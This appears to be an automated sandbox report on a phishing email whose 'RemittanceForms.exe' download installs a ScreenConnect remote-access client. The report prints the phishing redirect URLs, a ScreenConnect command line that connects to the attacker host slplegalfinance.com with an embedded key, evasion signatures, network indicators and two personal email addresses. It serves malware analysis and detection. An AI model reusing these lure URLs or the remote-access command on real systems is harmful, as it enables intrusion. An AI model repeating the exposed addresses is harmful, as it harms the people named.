Edit tour

Windows Analysis Report
phish_alert_iocp_v1.4.48 - 2025-01-16T090409.755.eml

Overview

General Information

Sample name:	phish_alert_iocp_v1.4.48 - 2025-01-16T090409.755.eml
Analysis ID:	1593000
MD5:	fe4a96153ab544caf5354670893ad386
SHA1:	11208f0dfdef4b053e0fbc0d2890620fa118ab94
SHA256:	5cf1bebd34724d875bcc4419d6b0137794c207d52bf70904d0e9bdc0865b1a18
Infos:

Detection

ScreenConnect Tool

Score:	84
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for dropped file

AI detected landing page (webpage, office document or email)

AI detected suspicious Javascript

AI detected suspicious elements in Email content

Changes security center settings (notifications, updates, antivirus, firewall)

Enables network access during safeboot for specific services

Modifies security policies related information

Possible COM Object hijacking

Reads the Security eventlog

Reads the System eventlog

Allocates memory with a write watch (potentially for evading sandboxes)

Checks for available system drives (often done to infect USB drives)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains capabilities to detect virtual machines

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates or modifies windows services

Deletes files inside the Windows folder

Detected non-DNS traffic on DNS port

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Found dropped PE file which has not been started or loaded

May sleep (evasive loops) to hinder dynamic analysis

Modifies existing windows services

Queries disk information (often used to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sigma detected: Office Autorun Keys Modification

Stores files to the Windows start menu directory

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected ScreenConnect Tool

Classification

Process Tree

System is w10x64_ra

OUTLOOK.EXE (PID: 5980 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\phish_alert_iocp_v1.4.48 - 2025-01-16T090409.755.eml" MD5: 91A5292942864110ED734005B7E005C0)

ai.exe (PID: 6880 cmdline: "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "53F80022-4EA9-497D-ADFC-B51F6B36E8C3" "55C219FA-EE3D-4DAB-B2D6-DD10726AC0B1" "5980" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx" MD5: EC652BEDD90E089D9406AFED89A8A8BD)

chrome.exe (PID: 6544 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://clicktime.cloud.postoffice.net/clicktime.php?U=https://fub.direct/1/wpcpz2KV6CJLjr9Ku5V9crqS4vRSbleRYVQVlbRDO0VhTlcqWS8eK4Wwlk02n24rcdimfqv_ywSiT_-hMwRGjBfgg1rcvHOcCbgDl1KQiWE/https/bahraincv.com/z63a2/6rr8dwuafolbxjbyml78hjrfslcaiy/alsco1171%40naver.com&E=tbirman%40firstfedweb.com&X=XID252daPm6J6574Xd1&T=FF1001&HV=U,E,X,T&H=94a20af2634289455489b3afe132d21067e17954 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 4300 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1972,i,9532732200185149555,16530467832849214428,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7888 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5532 --field-trial-handle=1972,i,9532732200185149555,16530467832849214428,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 8052 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=1092 --field-trial-handle=1972,i,9532732200185149555,16530467832849214428,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

RemittanceForms (1).exe (PID: 6064 cmdline: "C:\Users\user\Downloads\RemittanceForms (1).exe" MD5: BB46D23BFCA17013584E23F35E67C5FE)

msiexec.exe (PID: 3936 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\484f9eed1d8e13b9\ScreenConnect.ClientSetup.msi" MD5: 9D09DC1EDA745A5F87553048E57620CF)

svchost.exe (PID: 6824 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 6200 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 2184 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 6596 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

SgrmBroker.exe (PID: 6644 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: 3BA1A18A0DC30A0545E7765CB97D8E63)

svchost.exe (PID: 6736 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 6516 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

MpCmdRun.exe (PID: 7968 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)

conhost.exe (PID: 1092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

rundll32.exe (PID: 8120 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)

RemittanceForms.exe (PID: 4416 cmdline: "C:\Users\user\Downloads\RemittanceForms.exe" MD5: BB46D23BFCA17013584E23F35E67C5FE)

RemittanceForms.exe (PID: 7508 cmdline: "C:\Users\user\Downloads\RemittanceForms.exe" MD5: BB46D23BFCA17013584E23F35E67C5FE)

msiexec.exe (PID: 7600 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\484f9eed1d8e13b9\ScreenConnect.ClientSetup.msi" MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 7576 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)

msiexec.exe (PID: 1776 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 50CA2B6AF1D72CC80C4E11E477922C45 C MD5: 9D09DC1EDA745A5F87553048E57620CF)

rundll32.exe (PID: 7664 cmdline: rundll32.exe "C:\Users\user\AppData\Local\Temp\MSID5DB.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6346343 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments MD5: 889B99C52A60DD49227C5E485A016679)

msiexec.exe (PID: 6624 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 12F154F86D29205A07CD9883F3F7AAB3 MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 7740 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 658C20DC4570CE36B0E2CFA7882ABE33 E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 4284 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 8C89C74C56A8241057E69ABE1029F40F C MD5: 9D09DC1EDA745A5F87553048E57620CF)

rundll32.exe (PID: 4336 cmdline: rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI20FD.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6365687 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments MD5: 889B99C52A60DD49227C5E485A016679)

msiexec.exe (PID: 5088 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding C1CF189F56AA756A7464B123F5466459 MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 8136 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 85D94624DDB7360BF8B7EA65934AC6CF C MD5: 9D09DC1EDA745A5F87553048E57620CF)

rundll32.exe (PID: 4660 cmdline: rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI8F57.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6393796 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments MD5: 889B99C52A60DD49227C5E485A016679)

msiexec.exe (PID: 7700 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding FAAB4D8D67AEAB9EA3FB9C311B04B13B MD5: 9D09DC1EDA745A5F87553048E57620CF)

ScreenConnect.ClientService.exe (PID: 6696 cmdline: "C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=slplegalfinance.com&p=443&s=0dff7030-637d-4802-a9cf-5f63d3c8abe9&k=BgIAAACkAABSU0ExAAgAAAEAAQDVyeZoBLn8WdM6xWDr4b0uAsUBfhP2EJOSdZugmbrUWVWehsUh2LvfCfwDYGcJBhcBEWS%2fDmahaCPw1tkv%2f%2bw18TIjThn%2bQ%2feZavwugcHDfdkaqKi0LnYdddcCsozuL7%2bVQevv9snFAHOiSjLD7xdNlPMSw%2bw682fIJIkr8XbdhPPukmg4Ksp6Kf1Xba7KkmNnwSS1MRXckDb%2f1hQrUI%2fSZZdGbJvZ3tc%2f3CR0LXLnGeCLG7Dt5iRIHwzJf5XuTInHiPesoO6bSk%2bUfoeCYO3BjvU6pRL6UKY08mjZ7e%2b6FOQb4acTm6QTR9K%2fsvFdvWQ%2br7EyKwXpSy6iTh4x7%2f%2bv&t=NewBuild" MD5: 75B21D04C69128A7230A0998086B61AA)

ScreenConnect.WindowsClient.exe (PID: 7904 cmdline: "C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe" "RunRole" "d631616b-045d-46ad-b654-67b074b7884f" "User" MD5: 1778204A8C3BC2B8E5E4194EDBAF7135)

RemittanceForms.exe (PID: 3132 cmdline: "C:\Users\user\Downloads\RemittanceForms.exe" MD5: BB46D23BFCA17013584E23F35E67C5FE)

RemittanceForms.exe (PID: 6848 cmdline: "C:\Users\user\Downloads\RemittanceForms.exe" MD5: BB46D23BFCA17013584E23F35E67C5FE)

msiexec.exe (PID: 6004 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\484f9eed1d8e13b9\ScreenConnect.ClientSetup.msi" MD5: 9D09DC1EDA745A5F87553048E57620CF)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author
C:\Users\user\Downloads\Unconfirmed 804247.crdownload	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
C:\Windows\Temp\~DF42CD5E763AF0112E.TMP	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
C:\Windows\Temp\~DF402DAAA47C81A5E6.TMP	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
C:\Windows\Temp\~DF0ECFDAA9E240F7F8.TMP	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
C:\Windows\Temp\~DFF4B271A08BFF7223.TMP	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
C:\Windows\Installer\inprogressinstallinfo.ipi	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
C:\Config.Msi\60deb5.rbs	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
C:\Users\user\Downloads\Unconfirmed 804247.crdownload	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
C:\Windows\Temp\~DFFD1E74624B2A07AF.TMP	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
C:\Windows\Temp\~DFF27562D9BAF51155.TMP	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
C:\Windows\Temp\~DF42CD5E763AF0112E.TMP	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
C:\Windows\Temp\~DF402DAAA47C81A5E6.TMP	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
C:\Windows\Temp\~DF20F2A043957C83BC.TMP	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
C:\Windows\Temp\~DFF4B271A08BFF7223.TMP	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
C:\Windows\Temp\~DF0ECFDAA9E240F7F8.TMP	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
C:\Windows\Installer\inprogressinstallinfo.ipi	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
C:\Config.Msi\60deb5.rbs	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
C:\Users\user\Downloads\Unconfirmed 804247.crdownload	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
C:\Windows\Temp\~DF402DAAA47C81A5E6.TMP	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
C:\Windows\Temp\~DFF27562D9BAF51155.TMP	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
C:\Windows\Temp\~DF42CD5E763AF0112E.TMP	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
C:\Windows\Temp\~DFF4B271A08BFF7223.TMP	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
C:\Windows\Temp\~DF20F2A043957C83BC.TMP	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
C:\Windows\Temp\~DFFD1E74624B2A07AF.TMP	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
C:\Windows\Temp\~DF0ECFDAA9E240F7F8.TMP	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
C:\Windows\Installer\inprogressinstallinfo.ipi	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
C:\Config.Msi\60deb5.rbs	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
C:\Users\user\Downloads\Unconfirmed 804247.crdownload	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
Click to see the 26 entries

Memory Dumps

Source	Rule	Description	Author
00000014.00000002.1542049999.0000000005790000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
00000014.00000002.1546459519.00000000075E1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
00000011.00000000.1515151680.0000000000EC6000.00000002.00000001.01000000.00000006.sdmp	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
00000014.00000002.1533504706.0000000002F41000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
0000001C.00000000.1584484803.0000000000712000.00000002.00000001.01000000.00000013.sdmp	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
0000001F.00000002.1751971553.0000000007371000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
0000001F.00000002.1734467587.0000000002AEB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
00000028.00000002.2040657756.0000000007AB1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
00000028.00000002.2016235935.0000000003311000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
0000001C.00000002.2232338708.0000000002B61000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
Click to see the 5 entries

Sigma Signatures

Sigma detected: Office Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 5980, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Addins\OneNote.OutlookAddin\1

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 656, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6824, ProcessName: svchost.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for dropped file

Source: C:\Users\user\Downloads\RemittanceForms.exe (copy)

ReversingLabs: Detection: 23%

Phishing

AI detected landing page (webpage, office document or email)

Source: Email	Joe Sandbox AI: Page contains button: 'Review Document' Source: 'Email'
Source: Email	Joe Sandbox AI: Email contains prominent button: 'review document'

AI detected suspicious Javascript

Source: 0.2.id.script.csv

Joe Sandbox AI: Detected suspicious JavaScript with source url: https://clicktime.cloud.postoffice.net/clicktime.p... This script appears to be a part of a security solution that checks the safety of URLs before allowing users to access them. While the overall intent seems legitimate, there are several concerning behaviors that contribute to the high-risk score:1. The script uses obfuscated URLs and query strings, which is a high-risk indicator (+3 points).2. It sends user data (email address) to an external domain, which poses a data exfiltration risk (+3 points).3. The script interacts with multiple domains, some of which may be of unknown or dubious reputation, adding to the suspicion (+1 point).While the script is likely part of a security solution, the use of obfuscation and data transmission to external domains raises significant security concerns. Further review and validation of the script's purpose and the trustworthiness of the involved domains would be necessary to determine the true risk level.

AI detected suspicious elements in Email content

Source: Email

Joe Sandbox AI: Detected potential phishing email: The email contains suspicious URLs pointing to multiple redirects and questionable domains like 'bahraincv.com'. The subject line and content follow classic phishing patterns mentioning 'remittance' and 'eDocument' to create urgency. The email contains an excessive amount of tracking links and redirects through clicktime.cloud

Source: Email

Classification: Invoice Scam

Source: https://clicktime.cloud.postoffice.net/clicktime.php?U=https://fub.direct/1/wpcpz2KV6CJLjr9Ku5V9crqS4vRSbleRYVQVlbRDO0VhTlcqWS8eK4Wwlk02n24rcdimfqv_ywSiT_-hMwRGjBfgg1rcvHOcCbgDl1KQiWE/https/bahraincv.com/z63a2/6rr8dwuafolbxjbyml78hjrfslcaiy/alsco1171%40naver.com&E=tbirman%40firstfedweb.com&X=XID252daPm6J6574Xd1&T=FF1001&HV=U,E,X,T&H=94a20af2634289455489b3afe132d21067e17954	HTTP Parser: No favicon
Source: https://clicktime.cloud.postoffice.net/clicktime.php?U=https://fub.direct/1/wpcpz2KV6CJLjr9Ku5V9crqS4vRSbleRYVQVlbRDO0VhTlcqWS8eK4Wwlk02n24rcdimfqv_ywSiT_-hMwRGjBfgg1rcvHOcCbgDl1KQiWE/https/bahraincv.com/z63a2/6rr8dwuafolbxjbyml78hjrfslcaiy/alsco1171%40naver.com&E=tbirman%40firstfedweb.com&X=XID252daPm6J6574Xd1&T=FF1001&HV=U,E,X,T&H=94a20af2634289455489b3afe132d21067e17954	HTTP Parser: No favicon

Source: unknown	HTTPS traffic detected: 20.190.159.64:443 -> 192.168.2.16:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.23.242.162:443 -> 192.168.2.16:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.23.242.162:443 -> 192.168.2.16:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.190.159.64:443 -> 192.168.2.16:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.242.39.171:443 -> 192.168.2.16:65430 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:65431 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:65432 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:65433 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.16:65440 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:65441 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.4.254:443 -> 192.168.2.16:65445 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.226.254:443 -> 192.168.2.16:65449 version: TLS 1.2

Source: C:\Windows\SysWOW64\msiexec.exe	File opened: z:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: x:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: v:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: t:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: r:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: p:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: n:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: l:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: j:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: h:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: f:
Source: C:\Windows\System32\svchost.exe	File opened: d:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: b:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: y:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: w:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: u:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: s:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: q:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: o:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: m:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: k:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: i:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: g:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: e:
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	File opened: c:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: a:

Networking

Enables network access during safeboot for specific services

Source: C:\Windows\System32\msiexec.exe

Registry value created: NULL Service

Source: global traffic	TCP traffic: 192.168.2.16:57336 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:57336 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:65429 -> 162.159.36.2:53
Source: global traffic	TCP traffic: 192.168.2.16:57336 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:65429 -> 162.159.36.2:53
Source: global traffic	TCP traffic: 192.168.2.16:57336 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:65429 -> 162.159.36.2:53
Source: global traffic	TCP traffic: 192.168.2.16:57336 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:65429 -> 162.159.36.2:53

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.242.162

Source: global traffic	DNS traffic detected: DNS query: clicktime.cloud.postoffice.net
Source: global traffic	DNS traffic detected: DNS query: maxcdn.bootstrapcdn.com
Source: global traffic	DNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: cloud.postoffice.net
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: fub.direct
Source: global traffic	DNS traffic detected: DNS query: bahraincv.com
Source: global traffic	DNS traffic detected: DNS query: bitbucket.org
Source: global traffic	DNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
Source: global traffic	DNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: slplegalfinance.com

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
